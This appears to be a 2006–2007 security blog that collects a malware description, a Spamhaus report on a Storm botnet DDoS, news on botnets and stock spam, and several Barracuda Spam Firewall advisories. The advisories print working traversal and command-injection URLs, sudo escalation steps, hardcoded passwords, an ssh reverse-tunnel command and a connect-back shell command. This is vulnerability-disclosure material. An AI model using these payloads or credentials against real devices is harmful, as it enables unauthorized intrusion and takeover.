TROJ_STRAT.GI Malware type: Trojan
Aliases: No Alias Found
In the wild: Yes
Destructive: No
Language: English
File type: PE
Memory resident: Yes
Size of malware: 20,576 Bytes (compressed)
Initial samples received on: Jun 11, 2007
Payload 1: Downloads files
Details:This Trojan arrives as an attachment to email messages spammed by another malware or a malicious user.
It accesses the following Web site to download and execute a file:
http://{BLOCKED}esunhaxazedesa.com/getw.exe- detected by Trend Micro as WORM_STRAT.GI
As a result, routines of the downloaded worm are also exhibited on the affected system.
It comes with its own compression and runs on Windows 98, ME, NT, 2000, XP, and Server 2003.
Analysis By: Luis Antonio P. Magisa
Copyright (c) 1989-2007 Trend Micro Incorporated. All rights reserved.
Labels: Spam, Trojan
Spamhaus's web servers came under a DDoS attack starting yesterday at
just after 21:00 GMT. The attack is being carried out by the same people
responsible for the BlueSecurity DDoS last year, using the
Storm malware.
The attack method was sufficiently different to previous DDoS attacks on
us that some of it got through our normal anti-DDoS defenses and halted
our web servers.
At 02:00 GMT we got the attack under control and our web servers are now
back up, www.spamhaus.org is running again as normal.
The attack is ongoing, but it's being absorbed by anti-DDoS defenses.
Also under attack by the same gang are SURBL and URIBL.
Storm is the 'nightmare' botnet, capable of taking out government
facilities and causing much mayhem on the internet. It has 3 functions;
sending spam, fast-flux web and dns hosting mainly for stock scams, and
DDoS. There is a hefty international effort underway by cyber-forensics
teams in a joint effort by law enforcement and private sector botnet and
malware analysts to trace the perpetrators.
--
Steve Linford
The Spamhaus Project
http://www.spamhaus.org
Labels: Attack Tools, Botnet, DoS, Spam
Cyber-mobsters drop DoS attacks
Extortion technique no longer profitable, say experts
Shaun Nichols in California, vnunet.com 27 Apr 2007
The practice of holding websites hostage under the threat of denial-of-service (DoS) attacks is declining, according to security researchers at Symantec.
DoS attacks are carried out by botnet operators using armies of remotely controlled PCs to flood a site with traffic and information requests. The attacks can cause sites and web services to run slowly or shut down altogether.
Criminals use the attacks to extort money from organisations by launching a first DoS attack and then threatening to launch further attacks unless the company pays up.
The tactic has recently drawn the attention of legislators, who passed laws last November allowing for tougher punishments for the crime.
Symantec said that it has seen a steady decline in the number of reported DoS incidents in the past six months, and believes that much of it is due to the inefficiency of the practice.
The problem for the criminals, according to Symantec security engineer Yazan Gable, is that the brute-force attacks are often costly and inefficient for the botnet operator.
"Whenever a botnet owner carries out a DoS attack they run the risk of losing some of their bots," Gable said in an article for the company's security response blog.
"This could happen either because an attacking computer is identified and disinfected, or simply blocked by its ISP from accessing the network.
"Furthermore, if the botnet owner is not careful they could lose their entire network if their command and control server is identified."
Another problem for botnet operators arises when the victim calls the attacker's bluff and refuses to pay.
"Since the target has refused to pay, it is likely that they will never pay. As a consequence, the attacker has spent time and resources on a lost cause," wrote Gable.
The security engineer added that the drop in DoS extortion may also be due to the increased use of botnets to deliver large-scale spam mailings.
Gable noted that the drop in DoS attacks has coincided with a
dramatic rise in spam volumes, suggesting that the lower-risk, more lucrative spam market may be luring botnet owners away from the DoS attack business.
Labels: Botnet, DoS, News Article, Spam
Windows insecurity leads to the creation of botnets which are used to send oceans of spam to everyone. This is about a proposal to try to stem that tide. Of course if spam is stopped the botnets will still be there and used by the criminal gangs for other purposes. Ed.
=====================================
Spam storm needs ISP action, urges security chiefBy Will Sturgeon
Published: Wednesday 14 March 2007
Ispa, the UK's internet service providers' association, will today make a presentation to the House of Lords science and technology committee on computer security and spam.
The session, which follows the submission of a written response, coincides with claims the number of compromised PCs – known as botnets – in the UK has tripled over the past year.
And one security expert claims ISPs are still shirking their responsibilities.
These criminals have a very advanced command and control structure.
Speaking about the growing problem of botnets and the deluge of spam they create, David Rand, CTO of security company Trend Micro, told silicon.com: "I absolutely believe this is the ISPs' responsibility. Yet top ISPs still aren't doing anything."
Rand said: "It's not like the ISPs can't tell this is going on. They can see all this on their networks."
Many leading ISPs currently refuse to take measures such as blocking port 25 traffic, a move which Rand claimed would affect very few users sending legitimate email, while blocking the port used to relay email via the internet on compromised machines.
And he expressed doubts that ISPs would ever volunteer such measures to legislators because they fear taking greater responsibility for the use of their networks and the implications of increased operating costs.
A spokesman for Ispa said it understands the majority of spam originates from compromised PCs connected to its members' broadband services - and those of other ISPs - often unbeknownst to customers. But he said it is not the ISPs' lone responsibility to solve the problem, suggesting legislation and end-user education are essential tools in the fight.
The Ispa spokesman told silicon.com: "No ISP wants to tolerate any criminal activity on their network."
He also denied suggestions ISPs have been slow or unwilling to act on the matter. "If there was a flick-switch solution to this, we would have done it," he said.
Trend Micro's Rand told silicon.com the number of infected PCs has tripled in the UK over the past year, according to his company's research.
This means more UK homes and businesses are operating compromised PCs which - as well as sending vast volumes of spam - could potentially be plundered for sensitive data such as passwords or bank details.
Rand told silicon.com one reason for the upsurge in rogue activity on European networks dates back to a major fibre cut between China and Taiwan in December 2006. At that time botnet activity switched dramatically from China to Europe within around six minutes, he said.
Rand said millions of infected machines in Europe were brought online by the criminals who control them remotely, showing not only a vast amount of redundancy built into these criminal networks but also "highly sophisticated" business continuity plans.
He said: "These criminals have a very advanced command and control structure. We've got a real challenge ahead of us to take that down. And we've not managed it yet."
Labels: Botnet, News Article, Spam
WASHINGTON (Reuters) - The Securities and Exchange Commission suspended trading on Thursday in the stocks of 35 small companies linked to spam e-mail campaigns urging small investors to buy shares.
The SEC said it launched an enforcement effort to protect investors from potentially fraudulent spam e-mail promoting small company stocks with phrases like, ``Ready to Explode,'' ''Ride the Bull'' and ``Fast Money.''
``Today's action will disrupt the operations of these boiler rooms and make it harder for the spammers and promoters to dump their stock on an unsuspecting public,'' SEC enforcement director Linda Thomsen said at a press conference on Thursday.
The commission said in a statement that an estimated 100 million of these spam messages are sent every week, triggering dramatic spikes in share price and trading volume before the spamming stops and investors lose their money.
It said the stocks halted typically sell for less than $1 per share and are quoted on the Pink Sheets quotation service. The trading suspensions began on Thursday and will last for 10 business days, ending at noon on March 21, the agency said.
Mark Schonfeld, director of the SEC's northeast regional office, said that investor losses related to the 35 companies are in the tens of millions of dollars.
``Now that we have stopped the trading in these stocks, we will focus our attention on the people behind the spam and profiting from it,'' Schonfeld said.
He said the SEC is investigating the companies themselves as well as outsiders, and that the same people are likely behind multiple spam campaigns.
In one spam campaign involving Apparel Manufacturing Associates (APPM.PK), the SEC said the company's stock closed at 6 cents on trading volume of 3,500 shares on Friday, December 15, 2006.
After a weekend spam campaign distributed e-mails proclaiming ``Huge news expected out on APPM, get in before the wire, We're taking it all the way to $1.00,'' trading volume on Monday, December 18, 2006, soared to 484,568 shares with the price spiking to over 19 cents a share.
Two days later the APPM price climbed to 45 cents. However, by December 27, 2006, the price had slumped to 10 cents on trading volume of 65,350 shares, the agency said.
SEC Chairman Christopher Cox said that not even the investor protection agency is immune to the onslaught of stock-related spam. He said the SEC's public affairs director, John Nester, received an e-mail touting the stock of one of the 35 companies.
``Not even the SEC's spam filter can stop all this spam,'' Cox said.
The SEC said it suspended trading in the following stocks:
+ Advanced Powerline Technologies Inc.+ America Asia Petroleum Corp.+ Amerossi Int'l Group, Inc.+ Apparel Manufacturing Associates, Inc.+ Asgard Holdings Inc.+ Biogenerics Ltd.+ China Gold Corp.+ CTR Investments & Consulting, Inc.+ DC Brands International, Inc.+ Equal Trading, Inc.+ Equitable Mining Corp.+ Espion International, Inc.+ Goldmark Industries, Inc.+ GroFeed Inc.+ Healtheuniverse, Inc.+ Interlink Global Corp.+ Investigative Services Agencies, Inc.+ iPackets International, Inc.+ Koko Petroleum Inc.+ Leatt Corporation+ LOM Logistics, Inc.+ Modern Energy Corp.+ National Healthcare Logistics, Inc.+ Presidents Financial Corp.+ Red Truck Entertainment Inc.+ Relay Capital Corp.+ Rodedawg International Industries, Inc.+ Rouchon Industries, Inc.+ Software Effective Solutions Corp.+ Solucorp Industries Ltd.+ Sports-stuff.com Inc.+ UBA Technology, Inc.+ Wataire Industries Inc.+ WayPoint Biomedical Holdings, Inc.+ Wineco Productions Inc.
Labels: Spam
Barracuda Networks Spam Firewall Multiple Vulnerabilities Bugtraq ID: 19276
Class: Unknown
Remote: Yes
Local: No
Published: Aug 01 2006 12:00AM
Updated: Aug 08 2006 10:46PM
Credit: Greg Sinclair has been credited with the discovery of these vulnerabilities.
Vulnerable: Barracuda Networks Barracuda Spam Firewall 3.3.03.055
Barracuda Networks Barracuda Spam Firewall 3.3.03.053
Barracuda Networks Barracuda Spam Firewall 3.3.01.001
Spam Firewall is prone to multiple vulnerabilities, including a directory-traversal issue, access-validation issue, and a remote command-execution issue.
A remote attacker can exploit these issues to gain access to potentially sensitive information and execute commands in the context of the affected application.
-------
Matthew Hall (lists ecsc co uk)
Severity: High - Full system compromise possible
Date: 04 August 2006
Discovered by: Matthew Hall (matt (at) ecsc.co (dot) uk ) (Credits for original discovery to Greg Sinclair)
Discovered on: 03 Aug 2006
Summary:
Lack of input sanitisation in the Barracuda spam firewall
web interface allows execution of commands by unauthenticated users.
Combined with priviledge elevation techniques, execution of commands as
the root user is possible allowing a full system compromise.
Details:
In a follow-up investigation to bid 19276 - 'Barracuda Vulnerability:
Arbitrary File Disclosure [NNL-20060801-02]' by Greg Sinclair, further
investigation was performed by the Internet Defence Security Team and
several extra vulnerabilities were discovered, which when leveraged with
privilege escalation techniques allowed the remote execution of commands
as the root user without any authentication.
The original discovery by Greg Sinclair showed that it was possible to
open arbitrary files, either owned by the user/group 'nobody:nogroup' or
with world-read access, through the web interface using a path
sanitation vulnerability in preview_email.cgi, e.g:
https://
/cgi-bin/preview_email.cgi?file=/mail/mlog/../tmp/back
up/periodic_config.txt.tmp
Access to the path '/cgi-bin/preview_email.cgi' does not require any
authentication.
Using this vulnerability, it is also possible to use the pipe character
(|) to redirect the stdout of any programs run, to the stdin of the file
open function to print the output of the command back to the web
interface, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/l
s%20-la%20/|
It was then possible to leverage further privileges, as the user the
http daemon runs as (nobody), is granted root level access to several
system commands via the use of sudo, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/b
in/sudo%20touch%20/foo|
(Repeating the previous command should then show that the file 'foo' has
been created with root permissions in '/').
The commands allowed (this is not a canonical list) include:
mkdir, mv, cp, kill, ls, ln, chown, chmod, rm, echo, cat
(aswell as access to several 'wrapper' scripts in
/home/emailswitch/code/firmware/current/bin/)
Access to such commands as a chown and chmod allowed further privilege
escalation by setting the 'suid' bit on several other system programs,
which could then be executed through the webinterface, without the use
of sudo, and would run with root priviledges.
As such, a complete system compromise is possible remotely through the
web interface without any authentication.
It was also noted in bid 19276 - 'Barracuda Vulnerability: Hardcoded
Password [NNL-20060801-01]' a hardcoded 'guest' user password existed,
which was 'bnadmin99'.
During further investigation it was noted that there was also a
hard-coded 'admin' user password (this is the admin user for the web
interface), which is only possible to use if the httpd environment
variable 'REMOTE_ADDR' equals '127.0.0.1'.
If this case is true, then it is possible to login to the web interface
as the admin user using the password 'adminbn99'.
In order to gain elevated privileges to login to the web interface as
the admin user, it is possible to bind a reverse ssh shell which would
eventually satisfy the 'remote_addr == localhost' check.
It was possible to expose the ssh rsa public key, which then could be
copied to a users' '.ssh/authorized_keys2' on a local machine, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/c
at%20/home/emailswitch/code/config/id_rsa.pub|
With the public key in the authorized_keys2 file, it was then possible
to initiate the reverse shell from the web interface, e.g:
https:///cgi-bin/preview_email.cgi?file=/mail/mlog/../../usr/b
in/ssh%20-T%20-i%20/home/emailswitch/code/config/id_rsa%20-R%208080:loca
lhost:443%20@|
It was them possible to login to 'https://127.0.0.1:8080/' with the
username of 'admin' and password of 'adminbn99' and manage the device as
an administrator.
It was noted that the original file input sanitation vulnerability seems
to have been 'silently' fixed by Barracuda Networks (as of 11pm GMT
03/08/06), which mitigates the attacks above.
So far, no advisories or update notices can be found on their website,
and the version numbers of the affected software remains the same.
Recommendations:
We agree with Greg Sinclair's statement that the web interface should
never be made accessible from untrusted networks like the Internet.
The web interface on the Barracuda Spam Firewall has a history of
similar issues, so we believe that it is highly likely that more
vulnerabilities will be found in the future.
Exploit
Attackers can exploit these issues via a web client.
The following proof-of-concept URI is available.
/data/vulnerabilities/exploits/BarracudaDirectoryTraversalVulnerabilityAugust12006.html
/data/vulnerabilities/exploits/BarracudaRemoteCommandAugust032006.html
/data/vulnerabilities/exploits/BarracudaSpamFireWallExploitAugust082006.pl
Versions 3.3.01.001 to 3.3.03.055 are vulnerable to these issues.Labels: Appliance, Email, Spam, Vulnerability
Barracuda Spam Firewall default account
gssinclannlsoftware.com
Date: Tue Aug 01 2006 - 16:18:15 CDT
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Title: Barracuda Hardcoded Password Vulnerability
Severity: High (Sensitive Information Disclosure)
Date: 01 August 2006
Version Affected: Barracuda Spam Firewall version 3.3.01.001 to 3.3.03.053
Discovered by: Greg Sinclair (gssinclannlsoftware.com)
Discovered on: 28 May 2006
Overview:
Barracuda Spam Firewalls (www.barracudanetworks.com) are vulnerable to information disclosure which is made possible by a default guest password
Details:
The Barracuda Spam Firewalls from version 3.3.01.001 to 3.3.02.053 have a hardcoded password for the "guest" account in the Login.pm script. This script is called to validate any user who attempts to login to the barracuda's web interface (typically at http://
:8080 or https://). While the guest account has limited access, the following information can be obtained:
* system configuration including IP accesses, admin IP ACLs
* email message logs (but not the content of the messages)
* version information of both spam/antivirus definitions and system firmware version
Used in conjunction with the vulnerability "Barracuda Arbitrary File Disclosure" (NNL-20060801-02), the integrity of the system can be compromised. An attacker can use both vulnerabilities to download both confidential emails as well as the configuration information (including the admin password).
Additionally, while some accounts such as "admin" are bound by user definable IP ACLs, the guest account is not. This means that sensitive information can be disclosed to ANY IP address regardless of the user defined network restrictions.
Proof of Concept:
Enter the username "guest" into the login page of any open barracuda and the password "bnadmin99"
Recommendations:
* Never allow your Barracuda web interface to be accessible from untrusted networks (especially the Internet)
* Upgrade to version 3.3.0.54 or later
Vendor Contact:
29 May 2006 - Initial Vendor Contact
24 June 2006 - Vendor replies with prospect of fix
17 July 2006 - NNL request status update, no reply
01 Aug 2006 - NNL releases vuln report, notifies vendor of releaseLabels: Advisory, Appliance, Email, Spam, Vulnerability
Jean-Sébastien Guay-Leroux jean-sebastien at guay-leroux.com
Tue Apr 4 00:51:17 BST 2006
Topic: Barracuda LHA archiver security bug leads to remote compromise
Announced: 2006-04-03
Product: Barracuda Spam Firewall
Vendor: Barracuda Networks
Impact: Remote shell access
Affected product: Barracuda with firmware < 3.3.03.022 AND
spamdef < 3.0.10045
Credits: Jean-Sébastien Guay-Leroux
CVE ID: CVE-2004-0234
I. BACKGROUND
The Barracuda Spam Firewall is an integrated hardware and software solution for
complete protection of your email server. It provides a powerful, easy to use,
and affordable solution to eliminating spam and virus from your organization by
providing the following protection:
* Anti-spam
* Anti-virus
* Anti-spoofing
* Anti-phishing
* Anti-spyware (Attachments)
* Denial of Service
II. DESCRIPTION
When building a special LHA archive with long filenames in it, it is possible to
overflow a buffer on the stack used by the program and seize control of the
program.
Since this component is used when scanning an incoming email, remote compromise
is possible by sending a simple email with the specially crafted LHA archive
attached to the Barracuda Spam Firewall.
You do NOT need to have remote administration access (on port 8000) for
successfull exploitation.
For further informations about the details of the bugs, you can consult OSVDB
#5753 and #5754 .
III. IMPACT
Gain shell access to the remote Barracuda Spam Firewall
IV. PROOF OF CONCEPT
Using the PIRANA framework, available at http://www.guay-leroux.com , it is
possible to test the Barracuda Spam Firewall against the LHA vulnerability.
By calling PIRANA the way it is described below, you will get a TCP connect back
shell on IP address 1.2.3.4 and port 1234:
perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \
-p 1234 -z -c 1 -d 1
V. SOLUTION
Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045,
available March 24th 2006.
They also published an official patch in firmware #3.3.03.022, available April
3rd 2006.
It is recommended to update to firmware #3.3.03.022 .
VI. CREDITS
Ulf Harnhammar who found the original LHA flaw.
Jean-Sébastien Guay-Leroux who conducted further research on the bug
and produced exploitation plugin for the PIRANA framework.
VII. REFERENCES
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234
VIII. HISTORY
2006-03-02 : Disclosure of vulnerability to Barracuda Networks
2006-03-02 : Acknowledgement of the problem
2006-03-24 : Problem fixed
2006-04-03 : Advisory disclosed to public
Labels: Appliance, Bug, Spam, Vulnerability
Barracuda Spam Firewall Hashed Password Disclosure
OSVDB ID: 20879
Disclosure Date: Nov 16, 2005
Description:
Barracuda Spam Firewall contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an end user interacts with the system, which may disclose the user's encoded password in the URL. The encoded password is transmitted without the protection of SSL encryption, but would require an attacker to sniff the connection to obtain the information.
Vulnerability Classification:
Remote/Network Access Required
Cryptographic Attack
Information Disclosure Attack
Loss Of Confidentiality
Exploit Available
Verified
Concern
Products:
Barracuda Networks Barracuda Spam Firewall 3.1.17
Solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
External References:
Related OSVDB ID:
20878Vendor: Barracuda Networks
Other Advisory URL: http://osvdb.org/ref/20/20879-barracuda.txt
Credit:
security curmudgeon -
attrition.orgLabels: Advisory, Appliance, Email, Spam, Vulnerability